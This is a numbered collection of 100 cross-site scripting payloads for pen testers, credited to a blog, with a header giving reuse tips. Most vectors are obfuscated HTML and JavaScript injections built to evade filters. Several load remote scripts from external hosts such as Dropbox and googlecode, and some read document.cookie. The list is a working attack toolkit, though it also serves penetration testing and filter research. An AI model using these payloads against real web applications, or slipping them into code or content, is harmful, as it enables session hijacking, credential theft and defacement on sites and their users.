Credit: http://www.isoc.my/profiles/blogs/pure-cross-site-scripting-xss-vectors-you-need-as-a-pen-tester — Caveats before reusing this list: several vectors are tagged as browser- or plugin-specific ({Opera}, {IE7}, {Firefox & Opera}, "worksinIE", Flash `allowscriptaccess`), and the Flash and CSS `expression()` ones target features retired from current browsers; `%00` appears to stand for a literal NUL byte, so send the raw byte rather than the three characters; and the vectors that load a script from dl.dropbox.com or googlecode.com should be re-hosted on an origin you control before use.
1) <iframe %00 src="	javascript:prompt(1)	"%00> | |
2) <svg><style>{font-family:'<iframe/onload=confirm(1)>' | |
3) <input/onmouseover="javaSCRIPT:confirm(1)" | |
4) <sVg><scRipt %00>alert(1) {Opera} | |
5) <img/src=`%00` onerror=this.onerror=confirm(1) | |
6) <form><isindex formaction="javascript:confirm(1)" | |
7) <img src=`%00`
 onerror=alert(1)
 | |
8) <script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	></script> | |
9) <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=? | |
10) <iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> | |
11) <script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/ | |
12) "><h1/onmouseover='\u0061lert(1)'>%00 | |
13) <iframe/src="data:text/html,<svg onload=alert(1)>"> | |
14) <meta content="
 1 
; JAVASCRIPT: alert(1)" http-equiv="refresh"/> | |
15) <svg><script xlink:href=data:,window.open('https://www.google.com/')></script | |
16) <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} | |
17) <meta http-equiv="refresh" content="0;url=javascript:confirm(1)"> | |
18) <iframe src=javascript:alert(document.location)> | |
19) <form><a href="javascript:\u0061lert(1)">X | |
20) </script><img/*%00/src="worksinchrome:prompt(1)"/%00*/onerror='eval(src)'> | |
21) <img/	  src=`~` onerror=prompt(1)> | |
22) <form><iframe 	  src="javascript:alert(1)" 	;> | |
23) <a href="data:application/x-x509-user-cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	 >X</a | |
24) http://www.google<script .com>alert(document.location)</script | |
25) <a href=[�]"� onmouseover=prompt(1)//">XYZ</a | |
26) <img/src=@  onerror = prompt('1') | |
27) <style/onload=prompt('XSS') | |
28) <script ^__^>alert(String.fromCharCode(49))</script ^__^ | |
29) </style  ><script   :-(>/**/alert(document.location)/**/</script   :-( | |
30) �</form><input type="date" onfocus="alert(1)"> | |
31) <form><textarea onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'> | |
32) <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/ | |
33) <iframe srcdoc='<body onload=prompt(1)>'> | |
34) <a href="javascript:void(0)" onmouseover=
javascript:alert(1)
>X</a> | |
35) <script ~~~>alert(0%0)</script ~~~> | |
36) <style/onload=<!--	> alert (1)> | |
37) <///style///><span %2F onmousemove='alert(1)'>SPAN | |
38) <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1) | |
39) "><svg><style>{-o-link-source:'<body/onload=confirm(1)>' | |
40) <blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera} | |
41) <marquee onstart='javascript:alert(1)'>^__^ | |
42) <div/style="width:expression(confirm(1))">X</div> {IE7} | |
43) <iframe/%00/ src=javaSCRIPT:alert(1) | |
44) //<form/action=javascript:alert(document.cookie)><input/type='submit'>// | |
45) /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/> | |
46) //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\ | |
47) </font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style> | |
48) <a/href="javascript: javascript:prompt(1)"><input type="X"> | |
49) </plaintext\></|\><plaintext/onmouseover=prompt(1) | |
50) </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera} | |
51) <a href="javascript:\u0061le%72t(1)"><button> | |
52) <div onmouseover='alert(1)'>DIV</div> | |
53) <iframe style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> | |
54) <a href="jAvAsCrIpT:alert(1)">X</a> | |
55) <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> | |
56) <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> | |
57) <var onmouseover="prompt(1)">On Mouse Over</var>
58) <a href=javascript:alert(document.cookie)>Click Here</a> | |
59) <img src="/" =_=" title="onerror='prompt(1)'"> | |
60) <%<!--'%><script>alert(1);</script --> | |
61) <script src="data:text/javascript,alert(1)"></script> | |
62) <iframe/src \/\/onload = prompt(1) | |
63) <iframe/onreadystatechange=alert(1) | |
64) <svg/onload=alert(1) | |
65) <input value=<><iframe/src=javascript:confirm(1) | |
66) <input type="text" value=`` <div/onmouseover='alert(1)'>X</div> | |
67) http://www.<script>alert(1)</script .com | |
68) <iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															28
																1
																	%29></iframe> | |
69) <svg><script ?>alert(1) | |
70) <iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe> | |
71) <img src=`xx:xx`onerror=alert(1)> | |
72) <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" _origwidth="320" height="240" width="320"><param name="src" value="http://jsfiddle.net/XLE63/ "><embed wmode="opaque" type="application/x-shockwave-flash" src="http://jsfiddle.net/XLE63/" allowscriptaccess="never" _origwidth="320" height="240" width="320"> <param name="allowscriptaccess" value="never"><param name="wmode" value="opaque"></object> | |
73) <meta http-equiv="refresh" content="0;javascript:alert(1)"/> | |
74) <math><a xlink:href="//jsfiddle.net/t846h/">click | |
75) <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> | |
76) <svg contentScriptType=text/vbs><script>MsgBox+1 | |
77) <a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a | |
78) <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> | |
79) <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ | |
80) <script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F | |
81) <script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script | |
82) <object data=javascript:\u0061le%72t(1)> | |
83) <script>+-+-1-+-+alert(1)</script> | |
84) <body/onload=<!-->
alert(1)> | |
85) <script itworksinallbrowsers>/*<script* */alert(1)</script | |
86) <img src ?itworksonchrome?\/onerror = alert(1) | |
87) <svg><script>//
confirm(1);</script </svg> | |
88) <svg><script onlypossibleinopera:-)> alert(1) | |
89) <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe | |
90) <script x> alert(1) </script 1=2 | |
91) <div/onmouseover='alert(1)'> style="x:"> | |
92) <--`<img/src=` onerror=alert(1)> --!> | |
93) <script/src=data:text/javascript,alert(1)></script> | |
94) <div style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button> | |
95) "><img src=x onerror=window.open('https://www.google.com/');> | |
96) <form><button formaction=javascript:alert(1)>CLICKME | |
97) <math><a xlink:href="//jsfiddle.net/t846h/">click | |
98) <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
99) <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> | |
100) <a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a> |